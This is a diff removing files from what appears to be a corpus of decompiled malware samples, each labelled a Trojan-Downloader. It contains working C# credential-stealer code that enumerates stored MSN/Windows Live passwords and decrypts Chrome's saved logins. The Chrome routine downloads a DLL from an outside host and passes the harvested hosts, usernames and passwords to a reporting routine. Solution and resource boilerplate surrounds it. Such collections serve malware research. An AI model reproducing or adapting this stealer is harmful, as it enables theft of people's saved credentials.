public static extern bool CredEnumerateW(
|
|
||||||
string filter,
|
|
||||||
uint flag,
|
|
||||||
out uint count,
|
|
||||||
out IntPtr pCredentials);
|
|
||||||
|
|
||||||
public static string ZXt30g8cu7yvdJV9ndF1CY()
|
|
||||||
{
|
|
||||||
string str1 = "";
|
|
||||||
IntPtr pCredentials = IntPtr.Zero;
|
|
||||||
uint count;
|
|
||||||
if (!TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV.CredEnumerateW("WindowsLive:name=*", 0U, out count, out pCredentials))
|
|
||||||
return (string) null;
|
|
||||||
string str2 = str1 + "Result: " + count.ToString() + " Msn's found\r\n\r\n";
|
|
||||||
int num1 = checked ((int) ((long) count - 1L));
|
|
||||||
int num2 = 0;
|
|
||||||
while (num2 <= num1)
|
|
||||||
{
|
|
||||||
string u = (string) null;
|
|
||||||
TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV.CREDENTIAL structure = (TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV.CREDENTIAL) Marshal.PtrToStructure(Marshal.ReadIntPtr(pCredentials, checked (IntPtr.Size * num2)), typeof (TfvLgUdBvZbIbhpeKTUSXuCJmzyPTVNmCteMOjMQeaJXvwXgsV.CREDENTIAL));
|
|
||||||
string str3 = str2 + "Msn: " + structure.UserName + "\r\n";
|
|
||||||
string l = structure.UserName + "\r\n";
|
|
||||||
Marshal.PtrToStringBSTR(structure.CredentialBlob);
|
|
||||||
str2 = str3 + "Password: " + Marshal.PtrToStringBSTR(structure.CredentialBlob) + "\r\n\r\n";
|
|
||||||
string pa = Marshal.PtrToStringBSTR(structure.CredentialBlob) + "\r\n";
|
|
||||||
MyProject.Forms.UNNamOqklECJPYk.pPFBUwSOdPVCdM2k(8, u, l, pa);
|
|
||||||
checked { ++num2; }
|
|
||||||
}
|
|
||||||
return str2;
|
|
||||||
}
|
|
||||||
|
|
||||||
internal struct CREDENTIAL
|
|
||||||
{
|
|
||||||
public int Flags;
|
|
||||||
public int Type;
|
|
||||||
[MarshalAs(UnmanagedType.LPWStr)]
|
|
||||||
public string TargetName;
|
|
||||||
[MarshalAs(UnmanagedType.LPWStr)]
|
|
||||||
public string Comment;
|
|
||||||
public long LastWritten;
|
|
||||||
public int CredentialBlobSize;
|
|
||||||
public IntPtr CredentialBlob;
|
|
||||||
public int Persist;
|
|
||||||
public int AttributeCount;
|
|
||||||
public IntPtr Attributes;
|
|
||||||
[MarshalAs(UnmanagedType.LPWStr)]
|
|
||||||
public string TargetAlias;
|
|
||||||
[MarshalAs(UnmanagedType.LPWStr)]
|
|
||||||
public string UserName;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "adfND", "Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.csproj", "{9894B390-0DB2-433D-A7F6-A104E8017A1E}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{9894B390-0DB2-433D-A7F6-A104E8017A1E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
{9894B390-0DB2-433D-A7F6-A104E8017A1E}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{9894B390-0DB2-433D-A7F6-A104E8017A1E}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{9894B390-0DB2-433D-A7F6-A104E8017A1E}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
File diff suppressed because it is too large
Load Diff
@ -1,120 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<root>
|
|
||||||
<!--
|
|
||||||
Microsoft ResX Schema
|
|
||||||
|
|
||||||
Version 2.0
|
|
||||||
|
|
||||||
The primary goals of this format is to allow a simple XML format
|
|
||||||
that is mostly human readable. The generation and parsing of the
|
|
||||||
various data types are done through the TypeConverter classes
|
|
||||||
associated with the data types.
|
|
||||||
|
|
||||||
Example:
|
|
||||||
|
|
||||||
... ado.net/XML headers & schema ...
|
|
||||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
|
||||||
<resheader name="version">2.0</resheader>
|
|
||||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
|
||||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
|
||||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
|
||||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
|
||||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
|
||||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
|
||||||
</data>
|
|
||||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
|
||||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
|
||||||
<comment>This is a comment</comment>
|
|
||||||
</data>
|
|
||||||
|
|
||||||
There are any number of "resheader" rows that contain simple
|
|
||||||
name/value pairs.
|
|
||||||
|
|
||||||
Each data row contains a name, and value. The row also contains a
|
|
||||||
type or mimetype. Type corresponds to a .NET class that support
|
|
||||||
text/value conversion through the TypeConverter architecture.
|
|
||||||
Classes that don't support this are serialized and stored with the
|
|
||||||
mimetype set.
|
|
||||||
|
|
||||||
The mimetype is used for serialized objects, and tells the
|
|
||||||
ResXResourceReader how to depersist the object. This is currently not
|
|
||||||
extensible. For a given mimetype the value must be set accordingly:
|
|
||||||
|
|
||||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
|
||||||
that the ResXResourceWriter will generate, however the reader can
|
|
||||||
read any of the formats listed below.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.binary.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.soap.base64
|
|
||||||
value : The object must be serialized with
|
|
||||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
|
|
||||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
|
||||||
value : The object must be serialized into a byte array
|
|
||||||
: using a System.ComponentModel.TypeConverter
|
|
||||||
: and then encoded with base64 encoding.
|
|
||||||
-->
|
|
||||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
|
||||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
|
||||||
<xsd:element name="root" msdata:IsDataSet="true">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:choice maxOccurs="unbounded">
|
|
||||||
<xsd:element name="metadata">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="assembly">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:attribute name="alias" type="xsd:string" />
|
|
||||||
<xsd:attribute name="name" type="xsd:string" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="data">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
|
||||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
|
||||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
|
||||||
<xsd:attribute ref="xml:space" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
<xsd:element name="resheader">
|
|
||||||
<xsd:complexType>
|
|
||||||
<xsd:sequence>
|
|
||||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
|
||||||
</xsd:sequence>
|
|
||||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:choice>
|
|
||||||
</xsd:complexType>
|
|
||||||
</xsd:element>
|
|
||||||
</xsd:schema>
|
|
||||||
<resheader name="resmimetype">
|
|
||||||
<value>text/microsoft-resx</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="version">
|
|
||||||
<value>2.0</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="reader">
|
|
||||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
<resheader name="writer">
|
|
||||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
|
||||||
</resheader>
|
|
||||||
</root>
|
|
@ -1,282 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: adfND.UoWWUNNamOqklECJPYkRz4gYAPKn9TO
|
|
||||||
// Assembly: adfND, Version=2.1.3.4, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: B39AC443-093C-4412-BE50-149A7E6ADFED
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.cd-b42cf5dc593d9380920439dace615ab045e5dfbae25773d3b63b45980d1d1942.exe
|
|
||||||
|
|
||||||
using adfND.My;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.Collections;
|
|
||||||
using System.Data;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.IO;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Text;
|
|
||||||
|
|
||||||
namespace adfND
|
|
||||||
{
|
|
||||||
[StandardModule]
|
|
||||||
internal sealed class UoWWUNNamOqklECJPYkRz4gYAPKn9TO
|
|
||||||
{
|
|
||||||
public static string NewLine = Environment.NewLine;
|
|
||||||
public const string LineSplitter = " ";
|
|
||||||
|
|
||||||
public static string bzjvSEmfqVnJ5WyKeCu1SafAp9FwC80()
|
|
||||||
{
|
|
||||||
string str1 = "";
|
|
||||||
string[] strArray = new string[2]
|
|
||||||
{
|
|
||||||
"Login Data",
|
|
||||||
"Web Data"
|
|
||||||
};
|
|
||||||
int index = 0;
|
|
||||||
while (index < strArray.Length)
|
|
||||||
{
|
|
||||||
string str2 = strArray[index];
|
|
||||||
string pathName = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\";
|
|
||||||
if (File.Exists(pathName + str2))
|
|
||||||
{
|
|
||||||
if (!File.Exists(pathName + "sqlite3.dll"))
|
|
||||||
MyProject.Computer.Network.DownloadFile("http://mahi.fileave.com/sqlite3.dll", pathName + "sqlite3.dll");
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SetDllDirectory(pathName);
|
|
||||||
string str3 = pathName + Path.GetRandomFileName();
|
|
||||||
MyProject.Computer.FileSystem.CopyFile(pathName + str2, str3);
|
|
||||||
DataTable sqLiteTable = UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.GetSQLiteTable(str3, "logins");
|
|
||||||
File.Delete(str3);
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SetDllDirectory((string) null);
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (DataRow row in sqLiteTable.Rows)
|
|
||||||
{
|
|
||||||
string u = Conversions.ToString(row["origin_url"]);
|
|
||||||
string str4 = Conversions.ToString(row["username_value"]);
|
|
||||||
byte[] numArray1 = (byte[]) row["password_value"];
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB dataBlob1 = new UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB();
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB dataBlob2 = new UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB();
|
|
||||||
GCHandle gcHandle = GCHandle.Alloc((object) numArray1, GCHandleType.Pinned);
|
|
||||||
dataBlob1.pbData = (int) gcHandle.AddrOfPinnedObject();
|
|
||||||
dataBlob1.cbData = numArray1.Length;
|
|
||||||
gcHandle.Free();
|
|
||||||
ref UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB local1 = ref dataBlob1;
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB dataBlob3;
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB dataBlob4 = dataBlob3;
|
|
||||||
ref UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB local2 = ref dataBlob4;
|
|
||||||
ref UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB local3 = ref dataBlob2;
|
|
||||||
if (UoWWUNNamOqklECJPYkRz4gYAPKn9TO.CryptUnprotectData(ref local1, 0, ref local2, 0, 0, 0, ref local3))
|
|
||||||
{
|
|
||||||
byte[] numArray2 = new byte[checked (dataBlob2.cbData - 1 + 1)];
|
|
||||||
Marshal.Copy((IntPtr) dataBlob2.pbData, numArray2, 0, dataBlob2.cbData);
|
|
||||||
string str5 = Encoding.Default.GetString(numArray2);
|
|
||||||
if (Microsoft.VisualBasic.CompilerServices.Operators.CompareString(str4, "", false) != 0 && Microsoft.VisualBasic.CompilerServices.Operators.CompareString(str5, "", false) != 0)
|
|
||||||
{
|
|
||||||
str1 = str1 + " " + UoWWUNNamOqklECJPYkRz4gYAPKn9TO.NewLine + "Host : " + u + UoWWUNNamOqklECJPYkRz4gYAPKn9TO.NewLine + "Username : " + str4 + UoWWUNNamOqklECJPYkRz4gYAPKn9TO.NewLine + "Password : " + str5 + UoWWUNNamOqklECJPYkRz4gYAPKn9TO.NewLine + " " + UoWWUNNamOqklECJPYkRz4gYAPKn9TO.NewLine;
|
|
||||||
MyProject.Forms.UNNamOqklECJPYk.pPFBUwSOdPVCdM2k(2, u, str4, str5);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator enumerator;
|
|
||||||
if (enumerator is IDisposable)
|
|
||||||
(enumerator as IDisposable).Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
return str1;
|
|
||||||
}
|
|
||||||
|
|
||||||
[DllImport("crypt32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
private static extern bool CryptUnprotectData(
|
|
||||||
ref UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB pDataIn,
|
|
||||||
int ppszDataDescr,
|
|
||||||
ref UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB pOptionalEntropy,
|
|
||||||
int pvReserved,
|
|
||||||
int pPromptStruct,
|
|
||||||
int dwFlags,
|
|
||||||
ref UoWWUNNamOqklECJPYkRz4gYAPKn9TO.DATA_BLOB pDataOut);
|
|
||||||
|
|
||||||
[DllImport("kernel32.dll")]
|
|
||||||
private static extern bool SetDllDirectory(string pathName);
|
|
||||||
|
|
||||||
public class SQLiteWrapper
|
|
||||||
{
|
|
||||||
private const int SQL_OK = 0;
|
|
||||||
private const int SQL_ROW = 100;
|
|
||||||
|
|
||||||
[DebuggerNonUserCode]
|
|
||||||
public SQLiteWrapper()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_open(IntPtr fileName, ref IntPtr database);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_close(IntPtr database);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_prepare(
|
|
||||||
IntPtr database,
|
|
||||||
IntPtr query,
|
|
||||||
int length,
|
|
||||||
ref IntPtr statement,
|
|
||||||
ref IntPtr tail);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_step(IntPtr statement);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_column_count(IntPtr statement);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern IntPtr sqlite3_column_name(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_column_type(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_column_int(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern double sqlite3_column_double(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern IntPtr sqlite3_column_text(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern IntPtr sqlite3_column_blob(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_column_bytes(IntPtr statement, int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern IntPtr sqlite3_column_table_name(
|
|
||||||
IntPtr statement,
|
|
||||||
int columnNumber);
|
|
||||||
|
|
||||||
[DllImport("sqlite3")]
|
|
||||||
private static extern int sqlite3_finalize(IntPtr handle);
|
|
||||||
|
|
||||||
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
private static extern int lstrlenA(IntPtr lpString);
|
|
||||||
|
|
||||||
public static DataTable GetSQLiteTable(string DBPath, string TableName)
|
|
||||||
{
|
|
||||||
string s = "SELECT * FROM " + TableName + ";";
|
|
||||||
IntPtr database;
|
|
||||||
if (!File.Exists(DBPath) || UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_open(Marshal.StringToHGlobalAnsi(DBPath), ref database) != 0)
|
|
||||||
return new DataTable();
|
|
||||||
IntPtr statement;
|
|
||||||
IntPtr tail;
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_prepare(database, Marshal.StringToHGlobalAnsi(s), UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.lstrlenA(Marshal.StringToHGlobalAnsi(s)), ref statement, ref tail);
|
|
||||||
DataTable table = new DataTable();
|
|
||||||
int num = UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.ReadFirstRow(statement, ref table);
|
|
||||||
while (num == 100)
|
|
||||||
num = UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.ReadNextRow(statement, ref table);
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_finalize(statement);
|
|
||||||
UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_close(database);
|
|
||||||
return table;
|
|
||||||
}
|
|
||||||
|
|
||||||
private static int ReadFirstRow(IntPtr statement, ref DataTable table)
|
|
||||||
{
|
|
||||||
if (UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_step(statement) == 100)
|
|
||||||
{
|
|
||||||
int num1 = UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_count(statement);
|
|
||||||
object[] objArray = new object[checked (num1 - 1 + 1)];
|
|
||||||
int num2 = checked (num1 - 1);
|
|
||||||
int columnNumber = 0;
|
|
||||||
while (columnNumber <= num2)
|
|
||||||
{
|
|
||||||
string stringAnsi = Marshal.PtrToStringAnsi(UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_name(statement, columnNumber));
|
|
||||||
switch (UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_type(statement, columnNumber))
|
|
||||||
{
|
|
||||||
case 1:
|
|
||||||
table.Columns.Add(stringAnsi, typeof (int));
|
|
||||||
objArray[columnNumber] = (object) UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_int(statement, columnNumber);
|
|
||||||
break;
|
|
||||||
case 2:
|
|
||||||
table.Columns.Add(stringAnsi, typeof (float));
|
|
||||||
objArray[columnNumber] = (object) UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_double(statement, columnNumber);
|
|
||||||
break;
|
|
||||||
case 3:
|
|
||||||
table.Columns.Add(stringAnsi, typeof (string));
|
|
||||||
objArray[columnNumber] = (object) Marshal.PtrToStringAnsi(UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_text(statement, columnNumber));
|
|
||||||
break;
|
|
||||||
case 4:
|
|
||||||
table.Columns.Add(stringAnsi, typeof (byte[]));
|
|
||||||
objArray[columnNumber] = (object) UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.PointerToByteArray(UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_blob(statement, columnNumber), UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_bytes(statement, columnNumber));
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
table.Columns.Add(stringAnsi, typeof (object));
|
|
||||||
objArray[columnNumber] = (object) null;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
checked { ++columnNumber; }
|
|
||||||
}
|
|
||||||
table.Rows.Add(objArray);
|
|
||||||
}
|
|
||||||
return UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_step(statement);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static int ReadNextRow(IntPtr statement, ref DataTable table)
|
|
||||||
{
|
|
||||||
int num1 = UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_count(statement);
|
|
||||||
object[] objArray = new object[checked (num1 - 1 + 1)];
|
|
||||||
int num2 = checked (num1 - 1);
|
|
||||||
int columnNumber = 0;
|
|
||||||
while (columnNumber <= num2)
|
|
||||||
{
|
|
||||||
switch (UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_type(statement, columnNumber))
|
|
||||||
{
|
|
||||||
case 1:
|
|
||||||
objArray[columnNumber] = (object) UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_int(statement, columnNumber);
|
|
||||||
break;
|
|
||||||
case 2:
|
|
||||||
objArray[columnNumber] = (object) UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_double(statement, columnNumber);
|
|
||||||
break;
|
|
||||||
case 3:
|
|
||||||
objArray[columnNumber] = (object) Marshal.PtrToStringAnsi(UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_text(statement, columnNumber));
|
|
||||||
break;
|
|
||||||
case 4:
|
|
||||||
objArray[columnNumber] = (object) UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.PointerToByteArray(UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_blob(statement, columnNumber), UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_column_bytes(statement, columnNumber));
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
objArray[columnNumber] = (object) null;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
checked { ++columnNumber; }
|
|
||||||
}
|
|
||||||
table.Rows.Add(objArray);
|
|
||||||
return UoWWUNNamOqklECJPYkRz4gYAPKn9TO.SQLiteWrapper.sqlite3_step(statement);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static byte[] PointerToByteArray(IntPtr ptr, int Length)
|
|
||||||
{
|
|
||||||
if (ptr == IntPtr.Zero | Length == 0)
|
|
||||||
return new byte[0];
|
|
||||||
byte[] destination = new byte[checked (Length - 1 + 1)];
|
|
||||||
Marshal.Copy(ptr, destination, 0, Length);
|
|
||||||
return destination;
|
|
||||||
}
|
|
||||||
|
|
||||||
private enum SQLiteDataTypes
|
|
||||||
{
|
|
||||||
INT = 1,
|
|
||||||
FLOAT = 2,
|
|
||||||
TEXT = 3,
|
|
||||||
BLOB = 4,
|
|
||||||
NULL = 5,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private struct DATA_BLOB
|
|
||||||
{
|
|
||||||
public int cbData;
|
|
||||||
public int pbData;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
File diff suppressed because it is too large
Load Diff
@ -1,14 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
[assembly: ComVisible(false)]
|
|
||||||
[assembly: Guid("00000000-0000-0000-0000-000000000000")]
|
|
||||||
[assembly: AssemblyTrademark("")]
|
|
||||||
[assembly: AssemblyFileVersion("1.0.0.0")]
|
|
||||||
[assembly: AssemblyCopyright("")]
|
|
||||||
[assembly: AssemblyConfiguration("")]
|
|
||||||
[assembly: AssemblyDescription("")]
|
|
||||||
[assembly: AssemblyProduct("")]
|
|
||||||
[assembly: AssemblyTitle("")]
|
|
||||||
[assembly: AssemblyCompany("")]
|
|
||||||
[assembly: AssemblyVersion("1.0.0.0")]
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "lgy", "Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.csproj", "{7CC09C21-7D25-4F7C-961F-734C83B8CFBC}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{7CC09C21-7D25-4F7C-961F-734C83B8CFBC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
{7CC09C21-7D25-4F7C-961F-734C83B8CFBC}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{7CC09C21-7D25-4F7C-961F-734C83B8CFBC}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{7CC09C21-7D25-4F7C-961F-734C83B8CFBC}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
@ -1,201 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.bֲᶋ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using Plugin;
|
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.IO;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Resources;
|
|
||||||
using System.Runtime.Serialization.Formatters.Binary;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
public class bֲᶋ
|
|
||||||
{
|
|
||||||
